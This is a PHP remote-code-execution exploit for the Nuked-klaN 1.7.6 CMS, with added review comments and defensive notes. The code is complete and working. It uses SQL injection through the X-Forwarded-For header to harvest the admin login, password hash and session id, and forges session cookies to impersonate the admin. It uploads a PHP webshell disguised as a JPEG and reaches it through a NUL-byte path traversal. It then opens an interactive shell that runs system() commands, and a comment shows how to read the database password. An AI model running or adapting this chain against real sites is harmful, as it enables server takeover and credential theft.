
Nuked-klaN 1.7.6 Remote Code Execution Exploit



<?php
#
#  Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <gmdarkfig@xxxxxxxxx>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Kept private for 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file requires the PhpSploit class.
require("phpsploitclass.php");     # If you want to use this class, the latest
                                   # version can be downloaded from 
                                   # acid-root.new.fr.
                                   # (PhpSploit's source is not on this page;
                                   # from its use below it is presumably a small
                                   # HTTP client wrapper: headers, cookies, proxy,
                                   # multipart form data.)
# NOTE(review): this listing was line-wrapped by the mail archive, so several
# string literals below span two physical lines; read them as one line each.

# Phase 0: HTTP client setup.
$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = '';                     # proxy <proxyip>:<proxyport>
$pra = '';                     # basic authentification <proxyuser:proxypwd>

$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

# Attack parameters.
#   [0] table prefix, [1] cookie prefix.
#   [2] SQL tail that picks a single row of the users table (earliest `date`;
#       presumably the first-created, i.e. administrative, account — not
#       verifiable here).
#   [3] a 3-character marker used to locate injected query results in the
#       response body (see the preg_match_all below).
#   [4] the PHP payload that is later uploaded as "1.jpg" and include()d: when a
#       request carries a header named "Shell" (PHP exposes it as
#       $_SERVER['HTTP_SHELL']) it eval()s that header's value and brackets the
#       output with the literal 123456789 so the client can cut it out; otherwise
#       it behaves like the normal login block.
$config    = array();
$config[]  = 'nuked';                 # table prefix
$config[]  = 'nuked';                 # cookie prefix
$config[]  = 'ORDER by date LIMIT 1'; # sql conditions
$config[]  = 'HAK';                   # match, length <= 3
$config[]  = '<?php'."\n"             # php code
            .'error_reporting(0);'
            .'if(isset($_SERVER[HTTP_SHELL]))'
            .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}'
            .'else 
{include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';

# Four sub-selects — pseudo, pass, id of the chosen user, and that user's row in
# the sessions table — each wrapped in the marker plus an index digit (0..3) so
# the reflected values can be extracted from the page with one regex.
$request   = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users 
$config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users 
$config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users 
$config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE 
user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";

# Phase 1: SQL injection through the X-Forwarded-For request header.
# The header value closes an open string, supplies the rest of what looks like
# a VALUES list (random number, 2, a far-future timestamp, '', the CONCAT of
# the sub-select wrapped in markers) and comments out the remainder with '#'.
# This only works because the target presumably builds a query from the raw
# header value (not visible here). Defensive note: X-Forwarded-For is as
# attacker-controlled as any other header — treat it as untrusted input and use
# parameterized queries; quote characters or SELECT/CONCAT inside XFF are a
# reliable log/WAF signature for this class of attack.
for($i=0;$i<count($request);$i++)
{
        $deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT(";
        $sql = $deb.$request[$i]."))) #";
        $xpl->addheader("X-Forwarded-For",$sql);
        $xpl->get($url);
        $xpl->reset('header');
}

# Pull the four injected values back out of the last response body: each sits
# between "<marker><digit>" and "<marker><digit>". $matches[2][$i] is the value.
if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
  die("Exploit Failed");

$what = array("login","passwd","user_id","session");
for($i=0;$i<count($what);$i++)
   print "\n".$what[$i]." -> ".$matches[2][$i];

# Without a live session row for that user the impersonation below cannot work.
if(empty($matches[2][3]))
  exit("\nNo session found");

# Phase 2: impersonate the harvested account by presenting its session cookies
# (<prefix>_admin_session, <prefix>_user_id, <prefix>_sess_id). Defensive note:
# binding sessions to more than a database-readable id (e.g. rotating the id at
# login, short lifetimes) limits what a read-only SQL injection can yield.
# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);

# Phase 3: upload the PHP payload as a fake image ("1.jpg") through the
# profile-preferences form (multipart POST to ?file=User&op=update_pref).
# frmdt_url / frmdt_filename / frmdt_content are bare-word constants: if the
# PhpSploit class does not define them PHP treats them as strings with a notice
# (PHP < 8) or throws an Error (PHP 8+). Defensive note: checking only the
# extension of an uploaded "image" lets a file containing <?php through; inspect
# content and serve uploads from a location where PHP is not executed.
$phpc = array(
frmdt_url   => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));

$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');

# Read back the server-side path of the stored "photo" from the edit form.
if(!preg_match('#\<input name=\"photo\" 
value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";

# Phase 4: the admin "upgrade_db" page accepts raw SQL from a logged-in admin.
# The statements widen the block `type` column, then set block bid=1's type to a
# directory-traversal path to the uploaded file terminated by a NUL byte
# (presumably to truncate whatever suffix the application appends when it
# include()s "./Includes/blocks/block_<type>.php" — the payload's else branch
# suggests that is the include site), and finally empty the connected-users
# table. The commented-out statement would have enabled avatar uploads.
# Defensive note: an admin page that executes arbitrary SQL turns any session
# theft into full compromise; alert on ?file=Admin&page=mysql requests and on a
# block type containing "../" or a "\0" byte.
$sql   = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) 
CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE 
name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET 
type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";

for($i=0;$i<count($sql);$i++)
   $xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);

# Phase 5: interactive loop until "quit"/"exit". Each stdin line is wrapped in
# system('...') and sent as the "Shell" request header; the uploaded payload
# eval()s it and the output between the two 123456789 markers is printed.
# Defensive note: a non-standard "Shell:" request header is a trivial IDS
# signature, and eval()/system() reachable from request data is the root risk.
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
    # 0'); include('./conf.inc.php'); print $global['db_pass']; //
    $xpl->reset('header');
    $xpl->addheader('Shell',"system('$cmd');");
    $xpl->get($url);
    $data = explode('123456789',$xpl->getcontent());
    print $data[1]."\n\$shell> ";
}

function char($data)
{
        # Encode a byte string as a MySQL CHAR(n,n,...) expression, e.g.
        # char('on') === 'CHAR(111,110)' and char('') === 'CHAR()'.
        # Used above so that string values (including a NUL byte) can be
        # written into SQL without any quote character. Defensive note:
        # "CHAR(" followed by a comma-separated byte list inside request
        # parameters is a well-known injection signature worth alerting on.
        $byteCodes = unpack('C*', $data);   # one unsigned byte per element; [] for ''
        return 'CHAR(' . implode(',', $byteCodes) . ')';
}
?>